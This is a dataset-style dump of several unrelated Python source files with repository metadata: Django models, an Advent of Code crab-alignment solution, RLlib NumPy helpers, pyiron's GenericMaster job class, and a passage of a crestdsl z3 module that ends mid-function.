'partner_type': {'required': True},
}
_attribute_map = {
'partner_type': {'key': 'partnerType', 'type': 'str'},
}
def __init__(self, **kwargs):
super(IntegrationAccountPartnerFilter, self).__init__(**kwargs)
self.partner_type = kwargs.get('partner_type', None)
| 34.527778 | 76 | 0.624296 |
d274aac19ed2bf05afb93a894e04a54ae1e0995f | 495 | py | Python | django_rest_framework/posts_app/models.py | KushalVenkatesh/drf-secure-apis-demo | ef24928f9ad58e205827ce93ab3be3d1e80af715 | ["Apache-2.0"] | 1 | 2021-08-31T06:09:00.000Z | 2021-08-31T06:09:00.000Z | django_rest_framework/posts_app/models.py | KushalVenkatesh/drf-secure-apis-demo | ef24928f9ad58e205827ce93ab3be3d1e80af715 | ["Apache-2.0"] | null | null | null | django_rest_framework/posts_app/models.py | KushalVenkatesh/drf-secure-apis-demo | ef24928f9ad58e205827ce93ab3be3d1e80af715 | ["Apache-2.0"] | 1 | 2021-08-31T06:08:59.000Z | 2021-08-31T06:08:59.000Z |
from django.db import models
# Create your models here.
class Post(models.Model):
title = models.CharField(max_length=150)
description = models.CharField(max_length=1000)
author = models.CharField(max_length=150)
created_at = models.IntegerField()
votes = models.IntegerField()
class Comment(models.Model):
comment_author = models.CharField(max_length=150)
post = models.ForeignKey(Post, on_delete=models.CASCADE)
comment = models.CharField(max_length=1000)
| 27.5 | 60 | 0.745455 |
323c5cb2493e1057e0b3ce180a384d8ee50a6091 | 34 | py | Python | utils/__init__.py | elviswf/pytorch_cv | a7f11f857a0c1d5e5a807aeed5e594659212fba0 | ["Apache-2.0"] | 29 | 2018-05-24T12:47:23.000Z | 2021-12-31T02:05:27.000Z | tools/__init__.py | mxguo/DriverPostureClassification | 44b22e98e8952f9846db73177874de5c332e5cf5 | ["MIT"] | null | null | null | tools/__init__.py | mxguo/DriverPostureClassification | 44b22e98e8952f9846db73177874de5c332e5cf5 | ["MIT"] | 9 | 2018-05-24T13:39:42.000Z | 2020-10-23T08:29:01.000Z |
from .visualize import Visualizer
| 17 | 33 | 0.852941 |
9abbbb58601604ab5abba4c59ebb4be7c599e870 | 670 | py | Python | p7.py | fiskenslakt/aoc-2021 | 9f59f94364b1bdab11d167fe1848d2b0266f1b3b | ["MIT"] | null | null | null | p7.py | fiskenslakt/aoc-2021 | 9f59f94364b1bdab11d167fe1848d2b0266f1b3b | ["MIT"] | null | null | null | p7.py | fiskenslakt/aoc-2021 | 9f59f94364b1bdab11d167fe1848d2b0266f1b3b | ["MIT"] | null | null | null |
from aocd import data, submit
# data = '16,1,2,0,4,2,7,1,2,14'
pos = [int(p) for p in data.split(',')]
best_fuel = float('inf')
best_pos = None
for h in range(min(pos), max(pos)+1):
fuel = 0
for p in pos:
fuel += abs(p - h)
if fuel < best_fuel:
best_fuel = fuel
best_pos = h
print(best_fuel, h)
# submit(best_fuel)
pos = [int(p) for p in data.split(',')]
best_fuel = float('inf')
best_pos = None
for h in range(min(pos), max(pos)+1):
fuel = 0
for p in pos:
fuel += sum(range(1, abs(p - h)+1))
if fuel < best_fuel:
best_fuel = fuel
best_pos = h
# print(best_fuel, best_pos)
submit(best_fuel)
| 19.705882 | 43 | 0.577612 |
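A side note on the part-2 loop in p7.py above: `sum(range(1, d + 1))` is the triangular number d*(d+1)//2, so the same answer can be computed without the inner sum. A minimal sketch, not part of the dumped file (`pos` stands for the parsed crab positions):

```python
# Part 2 of the puzzle with the closed-form triangular-number cost.
def part2_fuel(pos):
    def cost(d):
        return d * (d + 1) // 2  # equals sum(range(1, d + 1))
    return min(
        sum(cost(abs(p - h)) for p in pos)
        for h in range(min(pos), max(pos) + 1)
    )

# The commented example input from the file above gives the known answer 168.
print(part2_fuel([16, 1, 2, 0, 4, 2, 7, 1, 2, 14]))  # -> 168
```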
5e6237065b82d92b71059b90b3b7dbda63337c03 | 9,814 | py | Python | rllib/utils/numpy.py | kifarid/ray | 43c97c2afb979987be82fa50048674e9b6776d5d | ["Apache-2.0"] | 3 | 2021-08-29T20:41:21.000Z | 2022-01-31T18:47:51.000Z | rllib/utils/numpy.py | QPC-database/amazon-ray | 55aa4cac02a412b96252aea4e8c3f177a28324a1 | ["Apache-2.0"] | 64 | 2021-06-19T07:06:15.000Z | 2022-03-26T07:13:16.000Z | rllib/utils/numpy.py | majacQ/ray | bc08c6cdcc7ddf4da751ca2a972defd3db509061 | ["Apache-2.0"] | 1 | 2021-05-20T22:00:15.000Z | 2021-05-20T22:00:15.000Z |
import numpy as np
import tree # pip install dm_tree
from ray.rllib.utils.framework import try_import_tf, try_import_torch
from ray.rllib.utils.typing import TensorType, Union
tf1, tf, tfv = try_import_tf()
torch, _ = try_import_torch()
SMALL_NUMBER = 1e-6
# Some large int number. May be increased here, if needed.
LARGE_INTEGER = 100000000
# Min and Max outputs (clipped) from an NN-output layer interpreted as the
# log(x) of some x (e.g. a stddev of a normal
# distribution).
MIN_LOG_NN_OUTPUT = -5
MAX_LOG_NN_OUTPUT = 2
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return np.where(
np.abs(x) < delta,
np.power(x, 2.0) * 0.5, delta * (np.abs(x) - 0.5 * delta))
def l2_loss(x):
"""Computes half the L2 norm of a tensor (w/o the sqrt): sum(x**2) / 2
Args:
x (np.ndarray): The input tensor.
Returns:
The l2-loss output according to the above formula given `x`.
"""
return np.sum(np.square(x)) / 2.0
def sigmoid(x, derivative=False):
"""
Returns the sigmoid function applied to x.
Alternatively, can return the derivative of the sigmoid function.
Args:
x (np.ndarray): The input to the sigmoid function.
derivative (bool): Whether to return the derivative or not.
Default: False.
Returns:
np.ndarray: The sigmoid function (or its derivative) applied to x.
"""
if derivative:
return x * (1 - x)
else:
return 1 / (1 + np.exp(-x))
def softmax(x, axis=-1):
"""
Returns the softmax values for x as:
S(xi) = e^xi / SUMj(e^xj), where j goes over all elements in x.
Args:
x (np.ndarray): The input to the softmax function.
axis (int): The axis along which to softmax.
Returns:
np.ndarray: The softmax over x.
"""
# x_exp = np.maximum(np.exp(x), SMALL_NUMBER)
x_exp = np.exp(x)
# return x_exp /
# np.maximum(np.sum(x_exp, axis, keepdims=True), SMALL_NUMBER)
return np.maximum(x_exp / np.sum(x_exp, axis, keepdims=True), SMALL_NUMBER)
def relu(x, alpha=0.0):
"""
Implementation of the leaky ReLU function:
y = x * alpha if x < 0 else x
Args:
x (np.ndarray): The input values.
alpha (float): A scaling ("leak") factor to use for negative x.
Returns:
np.ndarray: The leaky ReLU output for x.
"""
return np.maximum(x, x * alpha, x)
def one_hot(x: Union[TensorType, int],
depth: int = 0,
on_value: int = 1.0,
off_value: float = 0.0):
"""
One-hot utility function for numpy.
Thanks to qianyizhang:
https://gist.github.com/qianyizhang/07ee1c15cad08afb03f5de69349efc30.
Args:
x (TensorType): The input to be one-hot encoded.
depth (int): The max. number to be one-hot encoded (size of last rank).
on_value (float): The value to use for on. Default: 1.0.
off_value (float): The value to use for off. Default: 0.0.
Returns:
np.ndarray: The one-hot encoded equivalent of the input array.
"""
# Handle simple ints properly.
if isinstance(x, int):
x = np.array(x, dtype=np.int32)
# Handle torch arrays properly.
elif torch and isinstance(x, torch.Tensor):
x = x.numpy()
# Handle bool arrays correctly.
if x.dtype == np.bool_:
x = x.astype(np.int)
depth = 2
# If depth is not given, try to infer it from the values in the array.
if depth == 0:
depth = np.max(x) + 1
assert np.max(x) < depth, \
"ERROR: The max. index of `x` ({}) is larger than depth ({})!".\
format(np.max(x), depth)
shape = x.shape
# Python 2.7 compatibility, (*shape, depth) is not allowed.
shape_list = list(shape[:])
shape_list.append(depth)
out = np.ones(shape_list) * off_value
indices = []
for i in range(x.ndim):
tiles = [1] * x.ndim
s = [1] * x.ndim
s[i] = -1
r = np.arange(shape[i]).reshape(s)
if i > 0:
tiles[i - 1] = shape[i - 1]
r = np.tile(r, tiles)
indices.append(r)
indices.append(x)
out[tuple(indices)] = on_value
return out
def fc(x, weights, biases=None, framework=None):
"""
Calculates the outputs of a fully-connected (dense) layer given
weights/biases and an input.
Args:
x (np.ndarray): The input to the dense layer.
weights (np.ndarray): The weights matrix.
biases (Optional[np.ndarray]): The biases vector. All 0s if None.
framework (Optional[str]): An optional framework hint (to figure out,
e.g. whether to transpose torch weight matrices).
Returns:
The dense layer's output.
"""
def map_(data, transpose=False):
if torch:
if isinstance(data, torch.Tensor):
data = data.cpu().detach().numpy()
if tf and tf.executing_eagerly():
if isinstance(data, tf.Variable):
data = data.numpy()
if transpose:
data = np.transpose(data)
return data
x = map_(x)
# Torch stores matrices in transpose (faster for backprop).
transpose = (framework == "torch" and (x.shape[1] != weights.shape[0]
and x.shape[1] == weights.shape[1]))
weights = map_(weights, transpose=transpose)
biases = map_(biases)
return np.matmul(x, weights) + (0.0 if biases is None else biases)
def lstm(x,
weights,
biases=None,
initial_internal_states=None,
time_major=False,
forget_bias=1.0):
"""
Calculates the outputs of an LSTM layer given weights/biases,
internal_states, and input.
Args:
x (np.ndarray): The inputs to the LSTM layer including time-rank
(0th if time-major, else 1st) and the batch-rank
(1st if time-major, else 0th).
weights (np.ndarray): The weights matrix.
biases (Optional[np.ndarray]): The biases vector. All 0s if None.
initial_internal_states (Optional[np.ndarray]): The initial internal
states to pass into the layer. All 0s if None.
time_major (bool): Whether to use time-major or not. Default: False.
forget_bias (float): Gets added to first sigmoid (forget gate) output.
Default: 1.0.
Returns:
Tuple:
- The LSTM layer's output.
- Tuple: Last (c-state, h-state).
"""
sequence_length = x.shape[0 if time_major else 1]
batch_size = x.shape[1 if time_major else 0]
units = weights.shape[1] // 4 # 4 internal layers (3x sigmoid, 1x tanh)
if initial_internal_states is None:
c_states = np.zeros(shape=(batch_size, units))
h_states = np.zeros(shape=(batch_size, units))
else:
c_states = initial_internal_states[0]
h_states = initial_internal_states[1]
# Create a placeholder for all n-time step outputs.
if time_major:
unrolled_outputs = np.zeros(shape=(sequence_length, batch_size, units))
else:
unrolled_outputs = np.zeros(shape=(batch_size, sequence_length, units))
# Push the batch 4 times through the LSTM cell and capture the outputs plus
# the final h- and c-states.
for t in range(sequence_length):
input_matrix = x[t, :, :] if time_major else x[:, t, :]
input_matrix = np.concatenate((input_matrix, h_states), axis=1)
input_matmul_matrix = np.matmul(input_matrix, weights) + biases
# Forget gate (3rd slot in tf output matrix). Add static forget bias.
sigmoid_1 = sigmoid(input_matmul_matrix[:, units * 2:units * 3] +
forget_bias)
c_states = np.multiply(c_states, sigmoid_1)
# Add gate (1st and 2nd slots in tf output matrix).
sigmoid_2 = sigmoid(input_matmul_matrix[:, 0:units])
tanh_3 = np.tanh(input_matmul_matrix[:, units:units * 2])
c_states = np.add(c_states, np.multiply(sigmoid_2, tanh_3))
# Output gate (last slot in tf output matrix).
sigmoid_4 = sigmoid(input_matmul_matrix[:, units * 3:units * 4])
h_states = np.multiply(sigmoid_4, np.tanh(c_states))
# Store this output time-slice.
if time_major:
unrolled_outputs[t, :, :] = h_states
else:
unrolled_outputs[:, t, :] = h_states
return unrolled_outputs, (c_states, h_states)
# TODO: (sven) this will replace `TorchPolicy._convert_to_non_torch_tensor()`.
def convert_to_numpy(x, reduce_floats=False):
"""Converts values in `stats` to non-Tensor numpy or python types.
Args:
stats (any): Any (possibly nested) struct, the values in which will be
converted and returned as a new struct with all torch/tf tensors
being converted to numpy types.
reduce_floats (bool): Whether to reduce all float64 data into float32
automatically.
Returns:
Any: A new struct with the same structure as `stats`, but with all
values converted to numpy arrays (on CPU).
"""
# The mapping function used to numpyize torch/tf Tensors (and move them
# to the CPU beforehand).
def mapping(item):
if torch and isinstance(item, torch.Tensor):
ret = item.cpu().item() if len(item.size()) == 0 else \
item.cpu().detach().numpy()
elif tf and isinstance(item, tf.Tensor):
assert tf.executing_eagerly()
ret = item.cpu().numpy()
else:
ret = item
if reduce_floats and isinstance(ret, np.ndarray) and \
ret.dtype == np.float64:
ret = ret.astype(np.float32)
return ret
return tree.map_structure(mapping, x)
| 33.267797 | 79 | 0.612798 |
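The helpers in rllib/utils/numpy.py above are plain NumPy utilities. A short usage sketch, assuming a Ray installation so the dumped module is importable as `ray.rllib.utils.numpy`:

```python
# Usage sketch for the helpers defined in the file above; assumes `ray` is
# installed so that module is importable as ray.rllib.utils.numpy.
import numpy as np
from ray.rllib.utils.numpy import one_hot, softmax

x = np.array([0, 2, 1])
print(one_hot(x, depth=3))
# -> [[1. 0. 0.]
#     [0. 0. 1.]
#     [0. 1. 0.]]

logits = np.array([[1.0, 2.0, 3.0]])
probs = softmax(logits)            # entries clipped below by SMALL_NUMBER
print(probs, probs.sum(axis=-1))   # rows sum to ~1
```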
79c05b58af237ebcea09426131cf28adb0e3e7ac | 19,300 | py | Python | pyiron/base/master/generic.py | SanderBorgmans/pyiron | 81121b767b1d6371eb7c07be8e9301eba48aa557 | ["BSD-3-Clause"] | null | null | null | pyiron/base/master/generic.py | SanderBorgmans/pyiron | 81121b767b1d6371eb7c07be8e9301eba48aa557 | ["BSD-3-Clause"] | null | null | null | pyiron/base/master/generic.py | SanderBorgmans/pyiron | 81121b767b1d6371eb7c07be8e9301eba48aa557 | ["BSD-3-Clause"] | 2 | 2020-03-17T17:00:08.000Z | 2020-03-22T15:17:59.000Z |
# coding: utf-8
# Copyright (c) Max-Planck-Institut für Eisenforschung GmbH - Computational Materials Design (CM) Department
# Distributed under the terms of "New BSD License", see the LICENSE file.
import inspect
import textwrap
from pyiron.base.job.generic import GenericJob
"""
The GenericMaster is the template class for all meta jobs
"""
__author__ = "Jan Janssen"
__copyright__ = "Copyright 2019, Max-Planck-Institut für Eisenforschung GmbH - " \
"Computational Materials Design (CM) Department"
__version__ = "1.0"
__maintainer__ = "Jan Janssen"
__email__ = "janssen@mpie.de"
__status__ = "production"
__date__ = "Sep 1, 2017"
class GenericMaster(GenericJob):
"""
The GenericMaster is the template class for all meta jobs - meaning all jobs which contain multiple other jobs. It
defines the shared functionality of the different kind of job series.
Args:
project (ProjectHDFio): ProjectHDFio instance which points to the HDF5 file the job is stored in
job_name (str): name of the job, which has to be unique within the project
Attributes:
.. attribute:: job_name
name of the job, which has to be unique within the project
.. attribute:: status
execution status of the job, can be one of the following [initialized, appended, created, submitted,
running, aborted, collect, suspended, refresh,
busy, finished]
.. attribute:: job_id
unique id to identify the job in the pyiron database
.. attribute:: parent_id
job id of the predecessor job - the job which was executed before the current one in the current job series
.. attribute:: master_id
job id of the master job - a meta job which groups a series of jobs, which are executed either in parallel
or in serial.
.. attribute:: child_ids
list of child job ids - only meta jobs have child jobs - jobs which list the meta job as their master
.. attribute:: project
Project instance the jobs is located in
.. attribute:: project_hdf5
ProjectHDFio instance which points to the HDF5 file the job is stored in
.. attribute:: job_info_str
short string to describe the job by it is job_name and job ID - mainly used for logging
.. attribute:: working_directory
working directory of the job is executed in - outside the HDF5 file
.. attribute:: path
path to the job as a combination of absolute file system path and path within the HDF5 file.
.. attribute:: version
Version of the hamiltonian, which is also the version of the executable unless a custom executable is used.
.. attribute:: executable
Executable used to run the job - usually the path to an external executable.
.. attribute:: library_activated
For job types which offer a Python library pyiron can use the python library instead of an external
executable.
.. attribute:: server
Server object to handle the execution environment for the job.
.. attribute:: queue_id
the ID returned from the queuing system - it is most likely not the same as the job ID.
.. attribute:: logger
logger object to monitor the external execution and internal pyiron warnings.
.. attribute:: restart_file_list
list of files which are used to restart the calculation from these files.
.. attribute:: job_type
Job type object with all the available job types: ['ExampleJob', 'SerialMaster', 'ParallelMaster',
'ScriptJob', 'ListMaster']
.. attribute:: child_names
Dictionary matching the child ID to the child job name.
"""
def __init__(self, project, job_name):
super(GenericMaster, self).__init__(project, job_name=job_name)
self._job_name_lst = []
self._job_object_dict = {}
self._child_id_func = None
self._child_id_func_str = None
@property
def child_names(self):
"""
Dictionary matching the child ID to the child job name
Returns:
dict: {child_id: child job name }
"""
child_dict = {}
for child_id in self.child_ids:
child_dict[child_id] = self.project.db.get_item_by_id(child_id)["job"]
return child_dict
@property
def child_ids(self):
"""
list of child job ids - only meta jobs have child jobs - jobs which list the meta job as their master
Returns:
list: list of child job ids
"""
if self._child_id_func:
return self._child_id_func(self)
else:
return super(GenericMaster, self).child_ids
@property
def job_object_dict(self):
"""
internal cache of currently loaded jobs
Returns:
dict: Dictionary of currently loaded jobs
"""
return self._job_object_dict
def first_child_name(self):
"""
Get the name of the first child job
Returns:
str: name of the first child job
"""
return self.project.db.get_item_by_id(self.child_ids[0])['job']
def validate_ready_to_run(self):
"""
Validate that the calculation is ready to be executed. By default no generic checks are performed, but one could
check that the input information is complete or validate the consistency of the input at this point.
"""
pass
def append(self, job):
"""
Append a job to the GenericMaster - just like you would append an element to a list.
Args:
job (GenericJob): job to append
"""
if job.server.cores >= self.server.cores:
self.server.cores = job.server.cores
if job.job_name not in self._job_name_lst:
self._job_name_lst.append(job.job_name)
self._child_job_update_hdf(parent_job=self, child_job=job)
def pop(self, i=-1):
"""
Pop a job from the GenericMaster - just like you would pop an element from a list
Args:
i (int): position of the job. (Default is last element, -1.)
Returns:
GenericJob: job
"""
job_name_to_return = self._job_name_lst[i]
job_to_return = self._load_all_child_jobs(self._load_job_from_cache(job_name_to_return))
del self._job_name_lst[i]
with self.project_hdf5.open("input") as hdf5_input:
hdf5_input["job_list"] = self._job_name_lst
job_to_return.project_hdf5.remove_group()
job_to_return.project_hdf5 = self.project_hdf5.__class__(self.project, job_to_return.job_name,
h5_path='/' + job_to_return.job_name)
if isinstance(job_to_return, GenericMaster):
for sub_job in job_to_return._job_object_dict.values():
self._child_job_update_hdf(parent_job=job_to_return, child_job=sub_job)
job_to_return.status.initialized = True
return job_to_return
def move_to(self, project):
"""
Move the content of the job including the HDF5 file to a new location
Args:
project (ProjectHDFio): project to move the job to
Returns:
JobCore: JobCore object pointing to the new location.
"""
if self._job_id:
for child_id in self.child_ids:
child = self.project.load(child_id)
child.move_to(project.open(self.job_name + '_hdf5'))
super(GenericMaster, self).move_to(project)
def copy_to(self, project=None, new_job_name=None, input_only=False, new_database_entry=True):
"""
Copy the content of the job including the HDF5 file to a new location
Args:
project (ProjectHDFio): project to copy the job to
new_job_name (str): to duplicate the job within the same project it is necessary to modify the job name
- optional
input_only (bool): [True/False] to copy only the input - default False
new_database_entry (bool): [True/False] to create a new database entry - default True
Returns:
GenericJob: GenericJob object pointing to the new location.
"""
new_generic_job = super(GenericMaster, self).copy_to(project=project, new_job_name=new_job_name,
input_only=input_only,
new_database_entry=new_database_entry)
if new_generic_job.job_id and new_database_entry and self._job_id:
for child_id in self.child_ids:
child = self.project.load(child_id)
new_child = child.copy_to(project.open(self.job_name + '_hdf5'),
new_database_entry=new_database_entry)
if new_database_entry and child.parent_id:
new_child.parent_id = new_generic_job.job_id
if new_database_entry and child.master_id:
new_child.master_id = new_generic_job.job_id
return new_generic_job
def to_hdf(self, hdf=None, group_name=None):
"""
Store the GenericMaster in an HDF5 file
Args:
hdf (ProjectHDFio): HDF5 group object - optional
group_name (str): HDF5 subgroup name - optional
"""
super(GenericMaster, self).to_hdf(hdf=hdf, group_name=group_name)
with self.project_hdf5.open("input") as hdf5_input:
hdf5_input["job_list"] = self._job_name_lst
self._to_hdf_child_function(hdf=hdf5_input)
for job in self._job_object_dict.values():
job.to_hdf()
def from_hdf(self, hdf=None, group_name=None):
"""
Restore the GenericMaster from an HDF5 file
Args:
hdf (ProjectHDFio): HDF5 group object - optional
group_name (str): HDF5 subgroup name - optional
"""
super(GenericMaster, self).from_hdf(hdf=hdf, group_name=group_name)
with self.project_hdf5.open("input") as hdf5_input:
job_list_tmp = hdf5_input["job_list"]
self._from_hdf_child_function(hdf=hdf5_input)
self._job_name_lst = job_list_tmp
def set_child_id_func(self, child_id_func):
"""
Add an external function to derive a list of child IDs - experimental feature
Args:
child_id_func (Function): Python function which returns the list of child IDs
"""
self._child_id_func = child_id_func
self.save()
self.status.finished = True
def get_child_cores(self):
"""
Calculate the currently active number of cores by summing over all children which are neither finished nor
aborted.
Returns:
(int): number of cores used
"""
return sum([int(db_entry['computer'].split('#')[1]) for db_entry in
self.project.db.get_items_dict({'masterid': self.job_id})
if db_entry['status'] not in ['finished', 'aborted']])
def write_input(self):
"""
Write the input files for the external executable. This method has to be implemented in the individual
hamiltonians.
"""
raise NotImplementedError("write procedure must be defined for derived Hamilton!")
def collect_output(self):
"""
Collect the output files of the external executable and store the information in the HDF5 file. This method has
to be implemented in the individual hamiltonians.
"""
raise NotImplementedError("read procedure must be defined for derived Hamilton!")
def run_if_interactive(self):
"""
For jobs which executables are available as Python library, those can also be executed with a library call
instead of calling an external executable. This is usually faster than a single core python job.
"""
raise NotImplementedError("This function needs to be implemented in the specific class.")
def interactive_close(self):
"""
interactive close is not implemented for MetaJobs
"""
pass
def interactive_fetch(self):
"""
interactive fetch is not implemented for MetaJobs
"""
pass
def interactive_flush(self, path="generic", include_last_step=True):
"""
interactive flush is not implemented for MetaJobs
"""
pass
def run_if_interactive_non_modal(self):
"""
Run if interactive non modal is not implemented for MetaJobs
"""
pass
def __len__(self):
"""
Length of the GenericMaster equals the number of children appended.
Returns:
int: length of the GenericMaster
"""
return len(self._job_name_lst)
def __getitem__(self, item):
"""
Get/ read data from the GenericMaster
Args:
item (str, slice): path to the data or key of the data object
Returns:
dict, list, float, int: data or data object
"""
child_id_lst = self.child_ids
child_name_lst = [self.project.db.get_item_by_id(child_id)["job"] for child_id in self.child_ids]
if isinstance(item, int):
item = self._job_name_lst[item]
return self._get_item_when_str(item=item, child_id_lst=child_id_lst, child_name_lst=child_name_lst)
def __getattr__(self, item):
"""
Check whether a job with the specified name exists
Args:
item (str): name of the job
Returns:
dict, list, float, int, GenericJob: the object resolved by __getitem__ for the given name
"""
item_from_get_item = self.__getitem__(item=item)
if item_from_get_item is not None:
return item_from_get_item
else:
raise AttributeError
def _load_all_child_jobs(self, job_to_load):
"""
Helper function to load all child jobs into memory - mirroring the behaviour of the previous implementation
Args:
job_to_load (GenericJob): job to be reloaded
Returns:
GenericJob: job to be reloaded - including all the child jobs and their child jobs
"""
if isinstance(job_to_load, GenericMaster):
for sub_job_name in job_to_load._job_name_lst:
job_to_load._job_object_dict[sub_job_name] = \
self._load_all_child_jobs(job_to_load._load_job_from_cache(sub_job_name))
return job_to_load
def _load_job_from_cache(self, job_name):
"""
Helper function to load a job either from the _job_object_dict or from the HDF5 file
Args:
job_name (str): name of the job
Returns:
GenericJob: the reloaded job
"""
if job_name in self._job_object_dict.keys():
return self._job_object_dict[job_name]
else:
ham_obj = self.project_hdf5.create_object(class_name=self._hdf5[job_name + '/TYPE'], project=self._hdf5,
job_name=job_name)
ham_obj.from_hdf()
return ham_obj
def _to_hdf_child_function(self, hdf):
"""
Helper function to store the child function in HDF5
Args:
hdf: HDF5 file object
"""
hdf["job_list"] = self._job_name_lst
if self._child_id_func is not None:
try:
hdf["child_id_func"] = inspect.getsource(self._child_id_func)
except IOError:
hdf["child_id_func"] = self._child_id_func_str
else:
hdf["child_id_func"] = "None"
def _from_hdf_child_function(self, hdf):
"""
Helper function to load the child function from HDF5
Args:
hdf: HDF5 file object
"""
try:
child_id_func_str = hdf["child_id_func"]
except ValueError:
child_id_func_str = "None"
if child_id_func_str == "None":
self._child_id_func = None
else:
self._child_id_func_str = child_id_func_str
self._child_id_func = get_function_from_string(child_id_func_str)
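# Hypothetical round trip: after master.set_child_id_func(my_func), _to_hdf_child_function stores
# inspect.getsource(my_func) under 'child_id_func', and _from_hdf_child_function later rebuilds the
# callable from that source via get_function_from_string().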
def _get_item_when_str(self, item, child_id_lst, child_name_lst):
"""
Helper function for __getitem__ when item is of type string
Args:
item (str):
child_id_lst (list): a list containing all child job ids
child_name_lst (list): a list containing the names of all child jobs
Returns:
GenericJob or stored data: the child job or the HDF5 content addressed by item
"""
name_lst = item.split("/")
item_obj = name_lst[0]
if item_obj in child_name_lst:
child_id = child_id_lst[child_name_lst.index(item_obj)]
if len(name_lst) > 1:
return self.project.inspect(child_id)['/'.join(name_lst[1:])]
else:
return self.project.load(child_id, convert_to_object=True)
elif item_obj in self._job_name_lst:
child = self._load_job_from_cache(job_name=item_obj)
if len(name_lst) == 1:
return child
else:
return child['/'.join(name_lst[1:])]
else:
return super(GenericMaster, self).__getitem__(item)
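# Example with hypothetical job names: master['job_a'] reloads the child job as an object, while
# master['job_a/output/energy_tot'] follows the remaining path into the child's stored data.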
def _child_job_update_hdf(self, parent_job, child_job):
"""
Args:
parent_job:
child_job:
"""
child_job.project_hdf5.file_name = parent_job.project_hdf5.file_name
child_job.project_hdf5.h5_path = parent_job.project_hdf5.h5_path + '/' + child_job.job_name
if isinstance(child_job, GenericMaster):
for sub_job_name in child_job._job_name_lst:
self._child_job_update_hdf(parent_job=child_job, child_job=child_job._load_job_from_cache(sub_job_name))
parent_job.job_object_dict[child_job.job_name] = child_job
def _executable_activate_mpi(self):
"""
Internal helper function to switch the executable to MPI mode
"""
pass
def run_if_refresh(self):
"""
Internal helper function; run_if_refresh() is called when the job status is 'refresh'. If the job was
suspended previously, it is started again and continued.
"""
raise NotImplementedError('Refresh is not supported for this job type for job ' + str(self.job_id))
def _run_if_busy(self):
"""
Run if busy is not implemented for MetaJobs
"""
pass
def get_function_from_string(function_str):
"""
Convert a string of source code to a function
Args:
function_str: function source code
Returns:
function:
"""
function_dedent_str = textwrap.dedent(function_str)
exec(function_dedent_str)
return eval(function_dedent_str.split("(")[0][4:])
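# Minimal usage sketch (illustrative only):
# one_more = get_function_from_string("def one_more(x):\n    return x + 1\n")
# assert one_more(3) == 4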
| 35.740741
| 120
| 0.616477
|
71e89fbffab7d66002cbb1b878f3c6054be11dee
| 1,421
|
py
|
Python
|
example/mnist-embeddings.py
|
iamsdas/visdom
|
87e6bbc1b25598251735e1a098aae8074950a82b
|
[
"Apache-2.0"
] | 8,366
|
2017-03-16T16:39:54.000Z
|
2021-01-05T11:08:15.000Z
|
example/mnist-embeddings.py
|
Pandinosaurus/visdom
|
026958a66ce743f59e8f5232e974138c76b31675
|
[
"Apache-2.0"
] | 665
|
2017-03-16T16:51:32.000Z
|
2021-01-05T02:38:57.000Z
|
example/mnist-embeddings.py
|
Pandinosaurus/visdom
|
026958a66ce743f59e8f5232e974138c76b31675
|
[
"Apache-2.0"
] | 1,120
|
2017-03-16T17:18:17.000Z
|
2021-01-04T06:57:37.000Z
|
#!/usr/bin/env python3
# Copyright 2017-present, The Visdom Authors
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
import visdom
import numpy as np
from PIL import Image # type: ignore
import base64 as b64 # type: ignore
from io import BytesIO
import sys
try:
features = np.loadtxt("example/data/mnist2500_X.txt")
labels = np.loadtxt("example/data/mnist2500_labels.txt")
except OSError:
print("Unable to find files mmist2500_X.txt and mnist2500_labels.txt "
"in the example/data/ directory. Please download from "
"https://github.com/lvdmaaten/lvdmaaten.github.io/"
"blob/master/tsne/code/tsne_python.zip")
sys.exit()
vis = visdom.Visdom()
image_datas = []
for feat in features:
img_array = np.flipud(np.rot90(np.reshape(feat, (28, 28))))
im = Image.fromarray(img_array * 255)
im = im.convert('RGB')
buf = BytesIO()
im.save(buf, format='PNG')
b64encoded = b64.b64encode(buf.getvalue()).decode('utf-8')
image_datas.append(b64encoded)
def get_mnist_for_index(id):
image_data = image_datas[id]
display_data = 'data:image/png;base64,' + image_data
return "<img src='" + display_data + "' />"
vis.embeddings(features, labels, data_getter=get_mnist_for_index, data_type='html')
input('Waiting for callbacks, press enter to quit.')
| 29.604167
| 83
| 0.704433
|
df7903e7ac9195f24512f648d0859ed737a8a0f8
| 8,226
|
py
|
Python
|
crestdsl/simulation/z3conditionchangecalculator.py
|
stklik/CREST
|
7fd97c50b0c6c923e1c477105bed4f0ea032bb99
|
[
"MIT"
] | 14
|
2019-08-06T10:17:46.000Z
|
2022-03-13T12:50:59.000Z
|
crestdsl/simulation/z3conditionchangecalculator.py
|
stklik/CREST
|
7fd97c50b0c6c923e1c477105bed4f0ea032bb99
|
[
"MIT"
] | 16
|
2018-01-20T00:54:24.000Z
|
2019-07-24T15:43:42.000Z
|
crestdsl/simulation/z3conditionchangecalculator.py
|
stklik/CREST
|
7fd97c50b0c6c923e1c477105bed4f0ea032bb99
|
[
"MIT"
] | 1
|
2021-02-01T15:33:24.000Z
|
2021-02-01T15:33:24.000Z
|
import astor
import z3
from .to_z3 import Z3Converter, get_minimum_dt_of_several_anonymous
from crestdsl import sourcehelper as SH
from .epsilon import Epsilon
import logging
logger = logging.getLogger(__name__)
def get_behaviour_change_dt_from_constraintset(solver, constraints, dt, ctx=z3.main_ctx()):
times = {cs: cs.check_behaviour_change(solver, dt, ctx) for cs in constraints}
times = {cs: time for cs, time in times.items() if time is not None}
if len(times) > 0:
minimum = min(times, key=times.get)
return times[minimum], minimum.label
else:
return None, None
class ConstraintSet(object):
def __init__(self, constraints_until_condition, condition):
self.constraints_until_condition = constraints_until_condition
self.condition = condition
self.label = ""
def translate_to_context(self, ctx):
condition = self.condition.translate(ctx)
constraints = [c.translate(ctx) for c in self.constraints_until_condition]
translated = ConstraintSet(constraints, condition)
translated.label = self.label
return translated
def set_label(self, label):
self.label = label
def check_behaviour_change(self, solver, dt, ctx):
"""
Returns either a numeric (Epsilon) value or None.
The Epsilon value is the minimal time that has to pass before the condition's truth value can change.
"""
condition = self.condition
constraints = self.constraints_until_condition
if ctx != condition.ctx: # the wrong context, translate to the correct one
condition = self.condition.translate(ctx)
constraints = [c.translate(ctx) for c in self.constraints_until_condition]
solver.push() # initial solver point (#1)
solver.add(constraints)
solver.push() # (#2)
solver.add(condition)
solver.add(dt == 0)
check = solver.check() == z3.sat
logger.debug(f"The {self.label} is currently {check}")
solver.pop() # (#2)
""" Let's see if we can change something by just passing time """
solver.push() # new backtracking point (#3)
